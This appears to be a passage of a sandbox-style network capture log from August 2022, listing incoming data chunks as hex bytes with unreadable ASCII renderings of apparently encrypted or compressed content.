                                                                                                                        2022-08-05 03:05:18 UTC31INData Raw: 45 9a e9 02 b8 8d 00 35 b1 22 3b 12 a8 55 ae 59 38 4f fe ef 96 4e f4 1f 8c 9d 47 50 22 80 a2 c1 18 ed 44 e7 0b 1e 1e 0b 14 6b a7 27 97 55 6f 7a 5f 79 55 f2 2a 8b 7f ef d7 22 bf 50 18 64 7e 3e 57 14 08 7a a9 6c 83 05 8a e3 b0 f8 23 21 49 e7 ba ca d2 c6 eb fb 90 b9 8c 35 c3 24 f0 8b 3d 5f b9 00 42 8c e0 42 e1 d6 4b f1 30 b7 29 52 d7 c6 51 1e 7d 1d 83 d3 f1 2e f3 5b f1 c5 b6 d2 5c 11 02 f9 2a 17 b0 93 79 4b 7e 6f 31 9c 95 ca 6c 57 85 cd 68 b6 82 b0 db d9 81 19 8c 71 a3 e2 a0 f8 2a ed b4 cc a7 86 e2 dc 9f 74 a5 62 b0 ca ce cf 63 d7 88 f1 fe 6f 3c 34 ad 15 d0 82 98 9e 33 b7 4b a7 1c d7 a8 21 f7 a1 f3 a5 5a 1b 0f d9 bd 69 e9 af ac 25 85 d1 9a 43 39 c3 f9 05 1f bd e8 2c 6c ab b5 82 9f 04 13 b5 8a 1d 37 a8 4d 36 b8 38 61 de 49 7a 07 d9 6a be ca e0 4c 46 d2 19 dc
                                                                                                                        Data Ascii: E5";UY8ONGP"Dk'Uoz_yU*"Pd~>Wzl#!I5$=_BBK0)RQ}.[\*yK~o1lWhq*tbco<43K!Zi%C9,l7M68aIzjLF
                                                                                                                        2022-08-05 03:05:18 UTC32INData Raw: 36 e2 97 af 54 18 a2 ad dc f8 01 92 9a 4c 2e 0e e2 b4 97 57 5d 8d 01 0a a4 af 2a e4 33 c3 5d 3c a9 2e 0b 8c 7c af 60 9f 4a 87 3f d2 d3 a5 6b 69 41 a4 30 37 4c 31 bb 59 10 31 29 c1 5d 5f 57 d3 d2 0d 0f 4b 2e 58 5d 10 da d2 c1 fe a0 8f 22 db b3 2a 39 2b 95 ba e5 ee 2d e4 6c 3b 6c 65 ff 92 f9 d1 d7 b3 49 70 5f 07 76 72 c6 21 66 03 61 fe 21 2f ee a8 f7 c5 5d 21 f2 5d 26 de 41 94 22 30 fc dc 89 18 57 83 db 6d f7 72 ac 28 0a df 20 3e 72 bc cc c2 0a 34 88 88 50 85 4c cf ec 6f 06 a9 02 77 41 dc b1 aa 69 76 c7 b4 7c b0 fa a1 07 03 a6 9e 30 df fd 73 95 38 a0 d8 e1 e9 53 09 3d 76 e3 43 03 6f f6 4d 6f 66 88 87 e7 2f 7a 18 91 dd 9e d4 d4 e6 51 a9 f9 4d 02 45 3e c5 d1 dc b7 0d c5 29 e3 84 67 db 8b 6d 99 b8 c4 a3 a5 fb 66 4f a2 37 35 40 74 c1 0a c9 1b 86 fb 4b 40 15 41
                                                                                                                        Data Ascii: 6TL.W]*3]<.|`J?kiA07L1Y1)]_WK.X]"*9+-l;leIp_vr!fa!/]!]&A"0Wmr( >r4PLowAiv|0s8S=vCoMof/zQME>)gmfO75@tK@A
                                                                                                                        2022-08-05 03:05:18 UTC33INData Raw: f5 96 7a dd d2 4f 92 b2 df bb 8d 0c 10 78 2a 3f 77 5d 6a af 53 5d 6e d7 42 9e 5d f4 12 c7 9c 47 5e 19 2b b1 c4 0f c3 eb cb 0a 14 7b 25 10 73 c2 0f be e2 67 6b 5c 1f 5a dd 2b 8f 5d 5f d6 4d 23 78 d8 6e 6d 30 29 2e 66 12 a2 6a a1 54 8e f2 b1 97 47 37 58 e7 1c 3e be f7 ec d3 5a b2 52 25 bd 1e 9e e2 36 59 9b 4d 2e e6 e7 3c 8b 0a 95 ff 11 de 2c 5b be b9 91 1e 77 cb eb c4 88 2e f9 57 f3 5a b4 d2 5b 73 62 f9 28 13 de 33 61 2b 78 49 f1 9c 95 c0 01 68 8a cd 00 c0 aa 1b d9 d9 87 67 f7 41 a7 e6 f2 5a 28 ed ff e4 67 97 f6 dd 83 2d a5 62 b0 c0 95 ee 61 d7 84 82 9c 14 74 30 85 bd c1 84 ed 9d f2 b7 41 be 76 f9 ac 30 fb c8 f7 01 58 11 18 a2 c5 06 c7 aa 84 89 96 d4 84 04 d6 c2 f9 05 73 aa 82 2d 66 a7 c9 05 8f 01 76 ea 0f 1c 3d b1 59 20 94 4a 77 cf 70 fb 88 6e 0f 83 cd e8
                                                                                                                        Data Ascii: zOx*?w]jS]nB]G^+{%sgk\Z+]_M#xnm0).fjTG7X>ZR%6YM.<,[w.WZ[sb(3a+xIhgAZ(g-bat0Av0Xs-fv=Y Jwpn
                                                                                                                        2022-08-05 03:05:18 UTC35INData Raw: 2e b6 56 f6 1b 52 c6 97 ab 53 2d 26 aa dc e3 69 07 95 b2 25 4d 51 a4 91 58 49 05 3a 25 b5 a9 2a 58 32 c3 5d 60 62 2f 0b 87 55 84 67 b1 34 0f 15 d8 a0 a2 04 e4 42 d5 2a 58 c2 32 a8 56 2a 14 51 97 5b 77 74 57 bd a1 60 85 28 47 58 12 d9 bd 19 f9 bf 8c f1 12 41 0e 10 cb e0 81 e5 f1 26 db 67 2a 79 17 db 9e 07 d1 94 ef 37 3d 55 db ac 74 e5 16 5c 10 66 f4 3d 3e 79 43 f6 e9 44 22 fa 65 27 de 4b 62 30 37 93 03 a1 6e 5c a9 d6 7d 84 8d 52 cb 11 cc 25 3e 65 bb b3 54 0b 0e 81 81 69 1b 4c cf ea 71 6f 2e 02 73 5c c3 ba 55 7b 6a dd bc 06 b4 fb a1 50 2b b3 8e 26 c6 d0 3d d2 39 aa e1 9c f8 56 16 29 84 f1 68 16 78 f9 7a 45 9b 89 ad d9 03 5a 19 9a b2 50 fc c1 ed 4e af c2 3e 03 54 31 f7 59 3d bd 32 c9 3f 7f 96 79 25 8b 6b b1 a1 d2 a1 29 fa 63 56 5e 59 61 55 72 c9 0a d2 19 86
                                                                                                                        Data Ascii: .VRS-&i%MQXI:%*X2]`b/Ug4B*X2V*Q[wtW`(GXA&g*y7=Ut\f=>yCD"e'Kb07n\}R%>eTiLqo.s\U{jP+&=9V)hxzEZPN>T1Y=2?y%k)cV^YaUr
                                                                                                                        2022-08-05 03:05:18 UTC36INData Raw: 88 e3 38 a1 bd e6 f0 fb 9a b3 49 1f d5 21 71 e2 3c 5f e9 09 2d f7 fe 4e 66 21 95 fb 38 88 27 4a b0 87 47 82 66 c9 93 ed 15 3f fb 49 cd 59 a7 da 44 1b 9e e8 20 0d e0 0f 72 23 65 77 ad 8d 9d d6 78 cb 9a c5 17 d0 1e ab d3 c7 97 85 86 49 b8 eb cc 64 3b e5 e6 c6 b1 0b e7 df f3 19 b2 fe ab ce b6 aa 7b d0 94 e3 f0 3c 68 35 ad 1b c1 0a 5c aa 22 6d 56 62 94 ed ad 30 f0 c2 dd bb 55 19 08 de 2b b1 d8 a1 76 07 88 d5 82 26 65 55 f8 0f 1a 86 85 32 7c 2c 8d 86 8e 00 6f 80 83 93 8a aa 4f a9 08 f3 72 12 4f a8 04 45 05 8f ca ed 4e 45 82 b4 d2 23 9c 49 4c 57 11 13 f6 db df 7c 0c e9 f3 dc 48 de 77 75 96 83 07 5d 35 27 74 d0 fd 7a 45 e9 c2 74 08 0b 85 73 4e a3 79 73 e3 ef 97 f9 c3 33 59 8f 71 cd 97 44 e3 d5 30 32 29 d4 fc 67 18 27 b9 f3 22 88 8f 4b 45 eb 67 47 a7 92 a7 2d 88
                                                                                                                        Data Ascii: 8I!q<_-Nf!8'JGf?IYD r#ewxId;{<h5\"mVb0U+v&eU2|,oOrOENE#ILW|Hwu]5'tzEtsNys3YqD02)g'"KEgG-
                                                                                                                        2022-08-05 03:05:18 UTC37INData Raw: c8 f2 ee 20 01 c9 83 37 e2 f1 27 f6 7f 2f 69 4a 45 9e 07 da d3 a9 37 3d 55 14 76 68 dc b2 54 10 66 ff 26 00 6e 57 f6 e3 69 37 c3 59 3f 52 7e bc 37 30 ea fe 3b 6f 56 89 fd 59 54 c4 53 d7 13 e4 33 3e 63 b1 c2 3b 20 14 51 cb 69 1b 4e e7 f8 71 15 a4 11 61 50 d0 b2 2a 1f 5b de b6 4f bc ed b3 0f 39 ba b7 53 d5 d5 03 18 07 aa e1 9d fa 55 18 24 52 aa 44 03 74 e7 7c 62 9e 82 76 61 23 5a 19 81 d4 92 8f 5a e6 51 a9 c2 31 12 4f 26 c1 7e b1 bf 1e c4 01 6e 82 79 2f 9b 68 86 c2 c2 a4 2f 84 fb 4e a0 52 5c 4b 66 e2 0a c4 19 86 f7 46 f1 11 67 b3 01 61 f7 85 58 35 a8 ec 33 65 bd 60 4a 22 b1 db f0 86 57 32 11 58 9e 9b fb 79 b0 ce e1 e6 51 98 dc 99 6d de 68 4e fc 36 74 72 a5 d7 9c 78 f0 3e 96 8f 27 2a fe 61 23 93 45 a6 5d 5a 4c fb ad e2 c0 fe 18 66 ab c0 e3 0f fd 92 1a 18 eb
                                                                                                                        Data Ascii: 7'/iJE7=UvhTf&nWi7Y?R~70;oVYTS3>c; QiNqaP*[O9SU$RDt|bva#ZZQ1O&~ny/h/NR\KfFgaX53e`J"W2XyQmhN6trx>'*a#E]ZLf
                                                                                                                        2022-08-05 03:05:18 UTC39INData Raw: ee fa cc a7 97 e7 dd f3 0b 5a 63 96 cf 85 52 60 d7 82 e3 e6 07 7e 34 bc 1b dc 9e 15 b4 1e bb 47 9c b1 c7 ad 3a e2 c6 c0 bf 49 1b 1e cd af 19 cc 50 ad 03 85 d2 aa 85 17 c2 f3 83 37 95 83 2c 7f a4 b9 8a 9d 0b 7c 94 81 02 33 45 4b 0b ae 2f 4d 62 59 7e 83 e2 c5 8f cb e1 55 48 13 0c de 39 46 49 43 5e 1e fd df eb cf 7a 2e 4b e4 d5 54 5a 39 c2 87 87 9a ef f0 1e 7b db fd 61 67 6f d5 8a 03 36 8a 48 cc b5 70 62 f9 98 1c f2 c3 24 3c 8e 8e cc b1 41 ee cc 1c 0b b7 d4 f6 02 b4 f8 a8 dc 22 ae 8f 4b 45 eb 64 48 be b0 9f 3c 82 dd 3d f1 15 43 bd 40 d2 b6 05 3c c3 b6 5b ac 72 d4 29 4a f5 87 42 a5 90 61 2a 4b 90 42 42 0b 34 30 8a 85 39 33 c2 97 62 7f b6 71 1e ec 06 59 dd 0b 3e 41 9e f8 6e a8 9b 74 43 2e 20 86 1c 49 c5 08 78 3b b6 81 e6 a1 1b 3b 7c 4c d9 fb 6f 70 cb 55 2d 31
                                                                                                                        Data Ascii: ZcR`~4G:IP7,|3EK/MbY~UH9FIC^z.KTZ9{ago6Hpb$<A"KEdH<=C@<[r)JBa*KBB4093bqY>AntC. Ix;;|LopU-1
                                                                                                                        2022-08-05 03:05:18 UTC40INData Raw: b8 54 e6 92 63 68 5a d4 af 54 9d c3 a1 07 21 6e 8a 31 d5 d5 14 93 10 c5 e2 9c ef 3c 8e 23 7a f6 69 06 46 f3 53 65 98 98 af d9 b7 5b 19 9a b2 0d fd c1 ed 3e 32 d0 3b 09 6d 82 e8 56 c5 af 1b bc bc f2 83 73 36 8c 57 bf b6 ae 2c 28 eb 60 58 7a 4b 5d 52 7d f3 e5 b0 1a 86 e0 69 7c 19 4f dd 13 48 d9 9f d1 34 ae 85 bd 6e ac 6d 4a 21 8b 97 db f0 52 5d 9d 71 02 9c e8 78 b0 e1 dd 6f 53 89 dc 88 65 df 68 4e fb 14 48 5b 8d a5 89 86 f7 76 26 ab 36 25 c3 69 23 a6 47 a6 51 24 d6 eb a4 c0 b7 f7 0a 49 ec 30 e1 0f fd d5 1c 19 eb 1e 66 d6 dd 94 9b aa bc 4b 12 92 e5 6e 0a 0c 61 53 4e f4 5d 44 25 42 72 65 85 06 85 a5 4e f8 32 25 64 2e 44 1b f0 69 90 13 c2 a7 b8 93 c8 fb 34 d9 c5 5e 3b cd 32 32 6a b1 25 d4 5f 5b e4 d9 f7 90 02 ac de 67 04 99 65 bf e2 20 3a b8 2c 39 6c 3e 3a b3
                                                                                                                        Data Ascii: TchZT!n1<#ziFSe[>2;mVs6W,(`XzK]R}i|OH4nmJ!R]qxoSehNH[v&6%i#GQ$I0fKnaSN]D%BreN2%d.Di4^;22j%_[ge :,9l>:
                                                                                                                        2022-08-05 03:05:18 UTC41INData Raw: 9a 60 2d b7 cb e0 4c 93 0c 12 c1 24 90 4b 45 50 02 12 cd f9 22 82 f9 1e f4 c4 49 00 ea d3 96 97 98 f8 61 b8 57 b7 03 8f 92 76 e8 74 02 1a 82 6c 49 b7 70 62 78 80 04 51 c3 27 2c 94 70 cc 9d 57 ca c5 f3 ee b6 db e6 6d 12 f8 bb e6 0c bf 11 4b 4f f8 55 53 ad ab 89 3e 8c fa bb 0f 14 6f b0 40 d0 82 50 3c ef bb 40 be bb d2 27 53 f1 96 59 be 9d 61 2a 4b 8a 52 68 29 82 27 5a 04 0a 29 d1 92 71 6b ad 79 f3 e7 2a 4f df 1d 19 84 81 c7 71 ae 5a b1 54 d0 20 82 0b 51 d6 06 50 53 b3 99 12 88 26 2b 7e c8 7d e9 aa 70 0e d2 06 20 c3 de 72 b0 fc 47 b1 23 de cf 78 2c c9 9a fe ef da 0d 81 34 13 4a a3 51 bd 43 c1 0b 98 e3 24 2e fb f4 9c e8 e4 fa e2 e4 0b 4d 14 a8 da 3c 34 aa 8a 8f c8 33 f4 a9 7a a9 15 bf 05 74 c3 91 5b 2d d2 6d 9a e2 85 1d 91 81 59 05 aa 9a d9 e9 21 8f 94 b2 49
                                                                                                                        Data Ascii: `-L$KEP"IaWvtlIpbxQ',pWmKOUS>o@P<@'SYa*KRh)'Z)qky*OqZT QPS&+~}p rG#x,4JQC$.M<43zt[-mY!I
                                                                                                                        2022-08-05 03:05:18 UTC43INData Raw: 7e c7 0a 88 1a 86 fb b0 6d 16 19 96 11 48 db d8 4c 37 ae 85 86 38 be 6a 5d 00 ba f0 d8 f6 3b fa 17 70 08 44 f5 56 89 d0 c9 91 58 95 f2 ce f0 df 62 9a ed 3a 4c 5a 91 af 9f 78 f6 10 0a 92 05 20 e1 52 0b ea 47 a6 5b 05 d1 e6 e1 e8 df ee 0a 4f 82 a1 d0 0c fb e6 86 19 eb 4a 77 d3 e4 50 27 aa ba 52 1e 85 91 76 9f 0d 65 71 74 b5 4c 49 25 88 70 65 89 03 a7 b6 48 d2 6b 9e 46 2c 4e c3 ed 40 a9 28 d3 ad dd b7 e2 c3 32 c8 c3 91 30 a4 68 00 6b b7 30 f0 59 5f 8b f9 dd ce 07 bd d4 67 8f 98 65 bf e2 c2 38 b8 20 e1 73 17 7d 99 53 57 62 f2 c7 a4 5d f2 66 79 9c 41 70 30 99 b3 c4 09 eb 2d cb 16 3c 14 14 0b 73 c8 08 96 55 55 6b 46 2d 3a d3 31 8b 75 e6 cf 7d 26 50 44 6e 6d 3a 18 11 67 03 db d0 89 16 87 f8 b1 97 16 36 58 e7 1c 6a bf f7 ec d3 c8 b1 52 29 fa 39 9d e2 3a 30 7b 09
                                                                                                                        Data Ascii: ~mHL78j];pDVXb:LZx RG[OJwP'RveqtLI%peHkF,N@(20hk0Y_ge8 s}SWb]fyAp0-<sUUkF-:1u}&PDnm:g6XjR)9:0{
                                                                                                                        2022-08-05 03:05:18 UTC44INData Raw: 5d 73 ae ba 05 bf c2 34 05 07 60 b6 5c fc a6 ae 3d c9 61 f2 a9 6d de 2b 4e dd 38 4b ba 82 f0 ac 66 81 42 47 a5 33 1a 96 18 08 5c 4a 97 71 7c be be 1e f1 15 58 ef 98 28 bf 9f c5 7b bf 5b a2 2c a7 20 ae 0e 5a d4 13 5e 53 a7 9b 83 00 0b 3b 7a 55 d9 ef 7e 76 c8 46 42 a9 c2 df 7e ba fd 52 a0 1a 4e d4 86 27 c8 d7 c4 30 e9 8a 84 34 08 63 87 be ae 47 44 0c 90 eb 01 89 8b de 9d 66 55 b4 67 94 83 40 16 c3 f2 2f 30 ba 65 9a f5 23 8c 9e 7c a9 02 aa 0f 9b d0 d2 7f 04 d7 53 e7 09 52 4d 94 ab 5f 6a 9b a8 dc ef 00 9c 80 dd 32 23 da af 4f 5d 7f 29 26 0a a4 a7 56 89 1a fb 57 14 da f1 0b 97 49 95 b3 aa 4b 92 04 c9 bd 8b 00 96 bc 2a 26 1d 45 19 a8 5d 36 34 52 97 5d 2e 53 5d c6 ab 1b 51 28 47 53 03 dd 60 d0 8e 96 87 d3 c0 9f 23 00 cf 95 67 e4 fb c0 f6 7f 21 7d 62 e1 9e 07 ce
                                                                                                                        Data Ascii: ]s4`\=am+N8KfBG3\Jq|X({[, Z^S;zU~vFB~RN'04cGDfUg@/0e#|SRM_j2#O])&VWIK*&E]64R].S]Q(GS`#g!}b
                                                                                                                        2022-08-05 03:05:18 UTC45INData Raw: 05 d3 83 87 19 e1 60 65 d3 f5 38 65 a1 ba 58 60 91 ef 46 85 62 7a 58 63 bd 5f 4b 1c d2 67 4d 4e 28 bf b2 5f 59 03 56 46 2d 57 15 f2 6d 97 00 c3 21 e8 bb ca fa 90 d9 c1 5b 24 b6 3e 95 6a b7 3e f0 d0 5d 8b f5 ff 4e 15 98 fa 78 96 9a 6f aa 88 1e 32 90 12 3f 7d 38 8b ae 55 7d 69 ef ef 9c 5d f2 0f a7 4e 72 5b 20 9f b3 c4 08 f8 1b c2 0a db 14 1a 11 18 c8 09 87 43 76 6e 71 3c 3a cc 2e 93 8b e6 f8 46 27 53 6b a3 6c 3a 4c 1a 7e 01 ad 6c 98 13 94 0c b6 c5 05 30 4c cb f6 7e bd f1 fd 76 9d b2 52 2e de 29 89 e6 b0 60 b3 09 2c 44 e9 56 ff 22 5b fa 39 91 35 48 bd 91 40 1b 60 3f 85 d7 8a 36 e0 54 db d4 b3 c4 a3 0c 2e fa 3f 04 f3 93 72 2e 64 9f 30 b0 97 e1 6c 7c 2a ca 1e ee 04 b8 db df 96 94 90 41 a7 e3 d6 f0 3c e8 75 f3 a7 97 f7 75 e4 1f ad 76 ae d1 30 87 62 d7 83 ef f8
                                                                                                                        Data Ascii: `e8eX`FbzXc_KgMN(_YVF-Wm![$>j>]Nxo2?}8U}i]Nr[ Cvnq<:.F'Skl:L~l0L~vR.)`,DV"[95H@`?6T.?r.d0l|*A<uuv0b
                                                                                                                        2022-08-05 03:05:18 UTC47INData Raw: 73 67 de 49 05 f4 c2 df 72 bf de 51 a0 3b f2 1b 85 2d e3 8a c3 0b 88 1f 85 3e 15 d4 ab a8 ad 66 bf 01 91 e1 26 97 37 ff 9f 60 45 8f a7 84 97 5b 11 92 20 2d 30 bc 65 87 cc fe e0 ba 78 bc 12 93 52 8b c2 b7 4e 9c c4 53 e1 0c 7c ca 42 aa 59 0f a2 a5 cf e2 2d b5 85 b6 07 f2 d9 a5 97 43 5c 10 1a 12 8c 7b 44 9c 38 eb 73 14 d0 25 23 51 58 82 6f 91 c8 83 14 d2 1d 9d b3 68 43 df 08 ee 4d 33 a2 74 26 34 52 9d 4e 5b 42 5c a5 7d 1c 40 39 4c 43 0c ec 10 c7 e8 bb ae 09 db 9f 29 12 df 86 b6 ce b2 35 f3 7a 37 6a 73 e4 8f 0b c7 d3 6e 36 3d 55 2f a8 60 c0 34 43 c1 65 fe 36 20 e3 80 e1 c1 93 28 d2 57 0f 04 40 bc 3d 50 d4 0e a0 6e 5c ab 08 56 84 87 7b 0c 10 cc 2d 36 74 6d cf 61 07 09 8d 96 bf 08 40 de e0 60 05 9f b5 77 41 ac 71 54 68 50 c8 8f 5e 6b 8d d2 25 29 b3 99 23 df c4
                                                                                                                        Data Ascii: sgIrQ;->f&7`E[ -0exRNS|BY-C\{D8s%#QXohCM3t&4RN[B\}@9LC)5z7jsn6=U/`4Ce6 (W@=Pn\V{-6tma@`wAqThP^k%)#
                                                                                                                        2022-08-05 03:05:18 UTC48INData Raw: 2b 3f 77 23 50 86 8b 54 68 f9 80 7d 5c f2 66 c8 7e 46 5a 3b ad 69 c4 09 ed 44 ed 08 1e 12 0b 17 5b 12 0a 96 53 0a 41 58 61 3c 03 27 a3 42 e7 d4 47 0d 68 18 6e 67 e4 46 00 6d 7d 61 6c 89 1c b7 95 48 16 d8 e9 4e f2 3e 08 86 f7 ea fa b6 be 43 25 a7 1a 9f e2 3d 30 e4 09 2d ec 3d 53 e3 1d 43 e8 31 8a 27 4a b1 1f e6 21 8e 3f 7b 04 57 3b d6 79 ec c5 b6 d8 4e 0a 71 45 28 17 fc 98 4b 13 7e 61 3b 42 97 cc 44 50 a1 cd 4b 8a 82 ba db d9 81 19 ff 41 a7 e2 a9 f8 2a ed 22 cc a7 97 fa d7 ec 12 be 62 ba c7 bf a8 62 d7 b9 fc fc 14 ce 34 ad 11 36 84 eb b5 24 b7 41 b4 19 c6 ad 30 f1 ce df a4 5c 11 1e dc bd 07 c7 ae b2 2e 94 d4 97 2c 16 c2 e3 0f 1c 94 98 1d 6f a1 e6 87 8e 01 0d 85 8b 0c 4e 07 4a 27 b5 23 1b f4 58 7e 83 46 de 8c cb e6 51 22 31 03 cd 39 6b 5f 4f 4a d3 1c df c7
                                                                                                                        Data Ascii: +?w#PTh}\f~FZ;iD[SAXa<'BGhngFm}alHN>C%=0-=SC1'J!?{W;yNqE(K~a;BDPKA*"bb46$A0\.,oNJ'#X~FQ"19k_OJ
                                                                                                                        2022-08-05 03:05:18 UTC49INData Raw: ef 13 9b bc fb 2e 22 d0 b2 0b 7a bd 02 11 0c b1 bb 6d d5 33 c3 5d 02 4a 07 e3 85 59 84 74 bc 73 6a 17 d8 ac a0 7d 41 0a d4 20 3d 5b a9 80 b6 01 34 54 82 4b 77 1a 56 bd a1 19 d1 00 60 52 03 d7 bd f8 fb bf 80 cd df b7 c8 02 cf 93 d5 7a f1 27 fd 47 1e 6c 64 f1 9b 2f 3b f8 b8 31 28 49 2f 3b 60 c0 34 7c 8a 4e 12 33 28 f2 43 e0 c1 0c 28 d2 57 31 44 2e 98 35 31 fa c7 a4 46 bb 80 d1 51 eb 12 53 d7 1b e0 16 2f 65 aa d4 14 e6 1b 81 87 7c 0d 64 86 ed 71 1f b9 98 4e a8 c0 ba 52 7d 4c f6 f5 5d b5 f1 b7 9d 03 b0 9e 30 d3 fd 9b 94 38 a0 8e ba eb 53 0f 09 49 e1 41 2b 91 f2 52 63 f7 16 ab f1 2d 76 3c 81 db 8f f9 e9 08 52 a3 d7 2e 15 6d 7d e9 56 c9 ab 84 ea c7 f1 83 7f 30 9c 69 e7 b0 c1 ae 3f 71 09 69 a2 58 4b 50 72 e3 d2 b3 1a 80 9e 44 6f 10 61 bf 01 4e b0 ed 5a 35 a4 92
                                                                                                                        Data Ascii: ."zm3]JYtsj}A =[4TKwV`Rz'Gld/;1(I/;`4|N3(C(W1D.51FQS/e|dqNR}L]08SIA+Rc-v<R.m}V0i?qiXKPrDoaNZ5
                                                                                                                        2022-08-05 03:05:18 UTC51INData Raw: 95 fd 2e 4c a1 09 3c f4 fe 66 15 0b b9 eb 28 93 07 5e bc 91 57 71 5d c3 84 fd 96 0b e0 43 db d4 a4 cd 54 f3 03 d5 2f 01 e5 9e 7c 21 6d 73 31 8d 87 d5 7d a9 8a e1 03 d7 88 ad 41 d5 9e 0d 84 53 a7 f3 c8 e2 d4 ec d5 c5 d9 02 f6 d7 e6 1e bf 71 a8 c6 ac ba 7d c1 7c fd d0 1e 65 3e ba 8b d0 88 f4 a2 21 a5 41 a5 0b d9 a2 ce f0 e2 d6 9c 0b 13 1e dc ba 16 d4 bc ac 3e 86 cb 8e d2 17 ee e4 1e 1b 82 0e 4e 6c a1 a7 95 81 10 73 93 94 26 a0 aa 45 48 f1 28 65 c2 4b 77 96 63 16 9d cb f1 54 53 f2 02 e1 34 4f 4b 47 5e 07 10 cc c7 cf 6e 19 c4 1b d4 72 da ff d3 8f e9 94 eb ef 05 77 f7 ee 62 6d 61 d0 6b 0c e4 82 5c 4e a1 63 72 f9 8f 1c ea c3 24 24 8b 62 33 9c 7b fe d5 3e 0c 2d fc ff 69 12 ff be fe 24 bf 8f 41 59 b8 6b 51 ad ba 80 3e 9b d0 34 1e 06 70 93 af d5 b2 a3 2c cb ad 4d
                                                                                                                        Data Ascii: .L<f(^Wq]CT/|!ms1}ASq}|e>!A>Nls&EH(eKwcTS4OKG^nrwbmak\Ncr$$b3{>-i$AYkQ>4p,M
                                                                                                                        2022-08-05 03:05:18 UTC52INData Raw: 7b 0d 08 9f 07 da ed 46 35 62 73 1f 63 6a d1 2e f1 06 77 f5 21 38 6e 39 3d e9 45 23 ca 87 48 2a 41 bc 3d 3d ed dd b0 7e cc ab dc 53 84 8b 3c d4 10 cc 2d 2f 68 aa c1 2b dd 82 a9 8f 6d 1b 4a a0 ef 70 15 a4 5d 4a 33 d2 b1 45 78 c0 c8 ad 57 a4 eb 3b 68 e0 b3 9f 3a c2 0f 6a 60 38 aa eb 8f ec 42 02 33 6a e7 92 99 68 e0 59 74 88 9e 7d 6b 48 91 19 90 d7 86 26 ae 13 51 a3 db 28 05 36 16 ea 56 c5 af 0f d3 2c 9d 48 79 25 80 5b 9f 9f d0 b5 21 84 4e 4d a0 5e 5c 50 65 cd 4d 94 18 86 f7 7f 7c 01 62 d6 36 4a df f6 4a 24 86 8c aa 64 bb 05 71 2a a3 f4 de e1 45 5d 0a 71 02 90 ea 63 b6 31 da 81 43 88 cb e1 ce c2 97 bb 12 2d 6f 4c 5b bc 96 69 ff 07 19 b0 84 dd 10 b7 d5 ff 63 8e 6c 35 d1 f0 be fa a2 48 0a 4f 89 b7 c8 37 fb ba 8c c7 e9 12 5d da df 23 da b6 ba 58 14 83 ef 46 bf
                                                                                                                        Data Ascii: {F5bscj.w!8n9=E#H*A==~S<-/h+mJp]J3ExW;h:j`8B3jhYt}kH&Q(6V,Hy%[!NM^\PeM|b6JJ$dq*E]qc1C-oL[icl5HO7]#XF
                                                                                                                        2022-08-05 03:05:18 UTC53INData Raw: 42 61 d7 84 d4 a1 14 74 32 be 17 ca ac 00 b6 32 b1 69 58 1a c6 ab 18 ac ce df a2 49 19 17 f4 ba 02 c7 a8 84 0f 90 d4 84 04 4b c2 f9 09 0f 92 8a 05 4d a5 a6 80 a6 23 78 85 8d 35 60 bb 4a 21 b3 38 6d e0 76 7c 89 68 13 a7 e5 e0 46 47 1a 2d 9e 40 64 5a 49 47 1d 0a cf ce cf 78 2e 09 e6 d5 58 c7 ff ea a0 86 89 e0 80 27 6a d1 fb 61 64 61 ca 1b 26 18 83 76 58 be 61 65 89 a6 0d f8 c5 24 3f bc 53 c9 9d 51 88 ee 36 1a b1 d2 ed 64 7d e4 a9 d6 00 61 80 6e 67 cf 60 53 a7 a9 95 05 b0 c2 34 05 ca 6f 6e 44 f1 b6 99 3d c3 b6 5b a2 1e 62 3a 40 ff 9d 60 82 84 9f 21 b9 83 42 40 a0 1f 30 80 09 47 07 c2 96 71 7a a9 64 b6 e6 06 48 93 14 28 bf 60 d4 75 ae 44 b5 43 2e 3b ae 08 48 c5 02 50 42 b1 81 ec 89 00 3a 7c 46 da ff 70 67 cd 5f 2d 20 d9 df 78 a8 f4 73 b5 32 b5 d7 86 2d 99 9f
                                                                                                                        Data Ascii: Bat22iXIKM#x5`J!8mv|hFG-@dZIGx.X'jada&vXae$?SQ6d}ang`S4onD=[b:@`!B@0GqzdH(`uDC.;HPB:|Fpg_- xs2-
                                                                                                                        2022-08-05 03:05:18 UTC57INData Raw: d4 c9 c9 45 3c bc 05 36 6a a6 32 ce b0 5c a7 fc e2 83 02 bd c3 49 89 91 9b b8 a1 08 13 bd 12 0e 82 cd aa 86 1f 56 68 f5 c7 d0 5c f2 66 a0 b4 2c 5b 31 8f dc df 08 eb 21 e3 61 1f 14 10 7e 68 c9 09 9c 7f 65 70 6a 65 3a 40 2a 8b 75 62 d4 4d 34 23 a4 6e 6d 30 4a 39 49 10 a8 6a 82 3e 89 f2 b7 ef 48 8f 59 e3 3e 55 f0 f3 ea fd b2 fc 56 2f d4 35 f0 5b 3d 5f b9 21 b3 e6 e1 48 e0 d4 81 de 11 ac 2f 5b b2 82 54 16 7d e9 bc fb 89 24 2e 08 da c5 b6 a1 e3 0d 02 f3 25 10 de dc 67 2b 78 49 15 9c 95 c0 7d 53 9a c9 22 f7 82 ba d1 f5 b6 08 93 69 65 e3 da f2 39 eb e8 ca b4 9a e0 c4 e0 39 bf 73 b7 d7 b1 32 71 d0 8b fb ed 13 5c 10 ad 11 c9 eb 25 b5 32 bd 50 b8 0e 10 be 3c e0 c2 ce a9 d4 a6 2c 01 8e 04 cf 84 a5 40 26 d5 82 26 05 cc c1 d6 1c 95 83 3f 62 89 15 87 8e 0b 6f 8d 9a 15
                                                                                                                        Data Ascii: E<6j2\IVh\f,[1!a~hepje:@*ubM4#nm0J9Ij>HY>UV/5[=_!H/[T}$.%g+xI}S"ie99s2q\%2P<,@&&?bo
